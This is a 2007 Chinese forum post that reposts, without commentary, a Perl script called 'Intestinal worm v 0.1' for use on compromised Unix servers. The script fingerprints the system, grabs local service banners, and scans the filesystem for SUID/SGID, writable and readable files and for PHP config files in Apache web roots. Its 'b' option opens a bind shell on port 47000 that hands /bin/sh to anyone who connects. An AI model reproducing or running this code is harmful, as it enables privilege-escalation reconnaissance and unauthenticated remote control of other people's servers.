Perl病毒
killads
|
1#
killads 发表于 2007-09-10 19:21
Perl病毒
[Copy to clipboard] [ - ]
CODE:
#!/usr/bin/perl
use Socket; use IO::Socket; ###################................. ## Intestinal worm v 0.1 # written by nekd0 #(c) .unl0ck research team 2004-2005 # [url]http://unl0ck.void.ru[/url] ###################................. if (@ARGV<1){ print "\n"; print "\t\tIntestinal worm v 0.1\n\n"; print "\tUsage: perl un.pl <param>\n"; print "\te.g.: perl un.pl swa\n"; print "General options:\n"; print "\to - detecting OS, open ports, get banners from 21,22,23,80,3306 ports,\n"; print "\t if it's open\n"; print "\ts - searching for SUID, SGID files\n"; print "\tw - searching for writable files and dir's\n"; print "\tr - searching for files, which you can read\n"; print "If on machine installed Apache web server:\n"; print "\ta - searching for writable files, config's in web dir's\n"; print "Other functions:\n"; print "\tb - bind shell on 47000 port. need if you use http shell\n"; print "\n"; exit;} if(@ARGV>0){ $param=$ARGV[0]; if ($param=~/o/){open(LOG,">>/tmp/log.txt"); #Detecting OS info print LOG "\n\tDetecting OS...\n\n"; $DetOS=`uname -a`; @DetOS=split(/ /,`cat /proc/version`); print LOG "$DetOS@DetOS[0,1,2,8,9,10,11]\n\n"; print LOG "\tOpen ports...(use netstat -nt)\n"; $netstat=`netstat -nt`; print LOG "$netstat\n\n"; print LOG "Get banners from 21,22,25,80,3306 ports, if it's open...\n"; $ftpd=IO::Socket::INET->new(PeerAddr=>"localhost",PeerPort=>"21",Proto=>'tcp'); if ($ftpd) {$ftpd->send("\n"); $ftpd->recv($ftpd_answer,1000); print LOG "From ftpd(21 port) recived that answer: $ftpd_answer\n "; close($ftpd); } $sshd=IO::Socket::INET->new(PeerAddr=>"localhost",PeerPort=>"22",Proto=>'tcp'); if ($sshd){$sshd->send("\n\n\n"); $sshd->recv($sshd_answer,1000); print LOG "From sshd(22 port) recived that answer: $sshd_answer\n"; close($sshd); } $smptd=IO::Socket::INET->new(PeerAddr=>"localhost",PeerPort=>"25",Proto=>'tcp'); if($smtpd){$smtpd->send("\n\n\n"); $smtpd->recv($smtpd_answer,1000); print LOG "From smtpd(25 port) recived that answer: $smtpd_answer\n"; close($smtpd);} $httpd=IO::Socket::INET->new(PeerAddr=>"localhost",PeerPort=>"80",Proto=>'tcp'); if ($httpd){$httpd->send("GET / HTTP/1.0\n\n"); @httpd_amswer=<$httpd>; close($httpd); foreach $httpd_answer(@httpd_answer){if ($httpd_answer=~/Server:/) {print LOG "From httpd(80 port) recived that answer: $httpd_answer\n";}}} $mysqld=IO::Socket::INET->new(PeerAddr=>"localhost",PeerPort=>"3306",Proto=>'tcp'); if ($mysqld){$mysqld->send("\n\n\n"); $mysqld->recv($mysqld_answer,1000); close($mysqld); print LOG "From mysqld(3306 port) recived that answer: $mysqld_answer\n";} close(LOG);} #Searching for writable files, suid and sgid. if ($param=~/w/ or $param=~/s/ or $param=~/r/){ open(LOG,">>/tmp/log.txt"); $start="/"; if ($param=~/w/){print LOG "\n\tSearching for writable files...\n\n";} if ($param=~/s/){print LOG "\n\tSearching for SUID, SGID files...\n\n";} if ($param=~/r/){print LOG "\n\tSearching for files, wich you can read...\n\n";} @files=split(/\n/,`ls -F $start`); foreach $file(@files) {$pathtofile="$start/$file"; if (-d $pathtofile){push (@globaldirs,$pathtofile);}} foreach $filename(@globaldirs){ @files=split(/\n/,`ls -F $filename`); foreach $file(@files) {$file="$filename$file"; if (-d $file){push (@globaldirs,$file);} if ($param=~/w/) {if ((-d $file) and (-w $file)){print LOG "Dir $file is writable\n";} if ((-w $file) and (not(-d $file))){print LOG "File $file is writable\n";}} if ($param=~/s/){if (-u $file){print LOG "File $file is SUID\n";} if (-g $file){print LOG "File $file is SGID\n";}} if ($param=~/r/){if (-r $file){print LOG "You can read $file.\n"}} } } close(LOG);} #Special for apache web server #Searching for writable files in #web dirs. if ($ARGV[0]=~/a/) {$pathtohttpdconf="/usr/local/apache/conf/httpd.conf"; #default httpd.conf path if (-e $pathtohttpdconf){ open(HTTP,"$pathtohttpdconf"); @conf=<HTTP>; close(HTTP); foreach $conf(@conf) { chomp($conf); if ($conf=~/DocumentRoot \//) {push (@users,$conf);}} foreach $users(@users) {@dir=split(/ /,$users, 2);push (@webdirs,@dir[1]);} open(LOG,">>/tmp/log.txt"); print LOG "\n\tSearching for writable files in web dir's...\n\n\n"; foreach $start(@webdirs){ @files=split(/\n/,`ls -F $start`); foreach $file(@files) {$pathtofile="$start/$file"; if (-d $pathtofile){push (@globaldirs,$pathtofile);}} foreach $filename(@globaldirs){ @files=split(/\n/,`ls -F $filename`); foreach $file(@files) {$file="$filename$file"; if (-d $file){push (@globaldirs,$file);} if ((-d $file) and (-w $file)){print LOG "Dir $file is writable\n";} if ((-w $file) and (not(-d $file))){print LOG "File $file is writable\n";} if ($file=~/config.inc.php/ or $file=~/config.php/){print LOG "Config $file founded.\n";} } } close(LOG);} } else {print "Httpd.conf not found. Please use correct path to httpd.conf\n";exit;} } if ($param=~/b/) { $p=47000; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')); setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1); bind(S,sockaddr_in($p,INADDR_ANY)); listen(S,50); while(1){accept(X,S); if(!($pid=fork)){if(!defined $pid){exit(0);} open STDIN,"<&X"; open STDOUT,">&X"; open STDERR,">&X"; exec("/bin/sh -i"); close X;}} } } |